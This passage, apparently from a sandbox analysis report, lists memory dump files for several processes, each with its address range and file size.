                                                    • memory/852-264-0x0000000037220000-0x0000000037230000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/980-269-0x0000000000810000-0x0000000000837000-memory.dmp

                                                      Filesize

                                                      156KB

                                                    • memory/1400-113-0x000000000227B000-0x00000000022B2000-memory.dmp

                                                      Filesize

                                                      220KB

                                                    • memory/1400-110-0x0000000002270000-0x00000000022F0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1400-112-0x0000000002270000-0x00000000022F0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1400-111-0x0000000002270000-0x00000000022F0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1524-96-0x0000000002910000-0x0000000002990000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1524-92-0x0000000002910000-0x0000000002990000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1524-80-0x0000000002910000-0x0000000002990000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1524-81-0x0000000002910000-0x0000000002990000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1524-85-0x0000000002910000-0x0000000002990000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1524-91-0x0000000002990000-0x00000000029A0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/1740-104-0x000000013F7D0000-0x0000000140745000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1740-144-0x000000013F7D0000-0x0000000140745000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1740-139-0x000000013F7D0000-0x0000000140745000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1772-149-0x000000000261B000-0x0000000002652000-memory.dmp

                                                      Filesize

                                                      220KB

                                                    • memory/1772-148-0x0000000002614000-0x0000000002617000-memory.dmp

                                                      Filesize

                                                      12KB

                                                    • memory/1872-189-0x0000000002820000-0x00000000028A0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1872-185-0x0000000002820000-0x00000000028A0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/1872-191-0x000000000282B000-0x0000000002862000-memory.dmp

                                                      Filesize

                                                      220KB

                                                    • memory/1936-201-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1936-161-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1936-193-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1936-187-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1936-210-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1936-205-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/1936-202-0x000000013FA40000-0x00000001409B5000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/2004-84-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-88-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-71-0x0000000002290000-0x0000000002298000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/2004-95-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-94-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-93-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-78-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-79-0x0000000002350000-0x00000000023D0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2004-103-0x000000001CB00000-0x000000001DA75000-memory.dmp

                                                      Filesize

                                                      15.5MB

                                                    • memory/2008-174-0x00000000771E0000-0x0000000077389000-memory.dmp

                                                      Filesize

                                                      1.7MB

                                                    • memory/2008-175-0x0000000076FC0000-0x00000000770DF000-memory.dmp

                                                      Filesize

                                                      1.1MB

                                                    • memory/2016-54-0x00000000011D0000-0x00000000011E8000-memory.dmp

                                                      Filesize

                                                      96KB

                                                    • memory/2020-89-0x0000000002540000-0x00000000025C0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2020-87-0x0000000002540000-0x00000000025C0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2020-86-0x0000000002540000-0x00000000025C0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2020-90-0x000000001B530000-0x000000001B53E000-memory.dmp

                                                      Filesize

                                                      56KB

                                                    • memory/2024-169-0x0000000001F70000-0x0000000001FF0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2024-168-0x0000000002460000-0x0000000002468000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/2024-167-0x000000001AFD0000-0x000000001B2B2000-memory.dmp

                                                      Filesize

                                                      2.9MB

                                                    • memory/2024-170-0x0000000001F70000-0x0000000001FF0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2024-171-0x0000000001F70000-0x0000000001FF0000-memory.dmp

                                                      Filesize

                                                      512KB

                                                    • memory/2024-172-0x0000000001F7B000-0x0000000001FB2000-memory.dmp

                                                      Filesize

                                                      220KB